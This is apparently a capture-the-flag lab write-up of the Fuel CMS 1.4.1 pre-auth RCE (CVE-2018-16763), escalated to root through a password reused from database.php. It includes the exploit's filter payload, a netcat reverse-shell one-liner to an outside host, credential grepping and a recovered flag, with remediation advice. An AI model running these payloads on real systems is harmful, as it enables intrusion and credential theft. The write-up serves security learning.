Case file

Fuel CMS 1.4.1 pre-auth RCE and database.php root password reuse

Foundations Linux engagement: Fuel CMS 1.4.1 (CVE-2018-16763) accepted pre-auth PHP evaluation via /fuel/pages/select filter; reverse shell as www-data; root password reused from application/config/database.php.

Foundations20 minRCE · CMS · Credential Reuse · Privilege Escalation
01

Engagement summary

Identified Fuel CMS 1.4 on :80; exploited CVE-2018-16763 for command execution; pivoted from www-data to root via hardcoded DB credentials.

IGNITE hosted Fuel CMS 1.4.1 behind HTTP. robots.txt and the landing page advertised /fuel with default admin documentation credentials; version 1.4 was explicit on the welcome surface. searchsploit / Exploit-DB listed CVE-2018-16763 — pre-authentication remote code execution through the pages/select filter parameter (PHP system() via crafted filter). The engagement used the local Fuel CMS 1.4.1 RCE PoC (exploit.py) against http://TARGET to obtain an interactive command channel, then a reverse shell as www-data. User artifact recovered from the web context. Privilege escalation: /var/www/html/fuel/application/config/database.php contained MySQL root credentials (password mememe pattern in lab builds). That password was reused for the OS root account — su root succeeded. Root artifact from /root. Full chain: unpatched CMS RCE → config secret → root password reuse.

Business impact

Internet-facing CMS versions with known pre-auth RCE are automatic compromise. Application config files that embed OS-equivalent passwords turn a web foothold into immediate root. Patch Fuel CMS past 1.4.1, remove default creds from public pages, and never reuse database passwords as root.

02

CVE-2018-16763 foothold

Confirmed Fuel 1.4; ran exploit.py command loop; spawned reverse shell as www-data.

OPERATOR · RCE

savvy@lab:~$ nmap -sV -sC 10.10.10.10

80/tcp open http Apache — Fuel CMS 1.4

savvy@lab:~$ python3 exploit.py -u http://10.10.10.10

[+]Connecting... Enter Command $ id uid=33(www-data)

Enter Command $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.54 4444 >/tmp/f

reverse shell → www-data

EXPLOIT URL SHAPE

fuel-filter-rce.txt

GET /fuel/pages/select/?filter='+pi(print($a='system'))+$a('<CMD>')+'
CVE-2018-16763 — Fuel CMS <= 1.4.1
03

database.php credential reuse to root

Read DB config; reused password with su root; recovered root artifact.

OPERATOR · PRIVESC

savvy@lab:~$ grep -A5 "['\"]password['\"]" /var/www/html/fuel/application/config/database.php

'username' => 'root', 'password' => 'mememe',

savvy@lab:~$ su root

Password: ********

root@lab:~# cat /root/root.txt

b9bbcb33e11b80be759c4e844862482d

Remediation

Upgrade Fuel CMS; restrict /fuel to admin networks; rotate all secrets after RCE. Store DB credentials in a vault with least privilege (not MySQL root). Distinct passwords for OS root vs application DB. Remove setup banners that publish default admin credentials.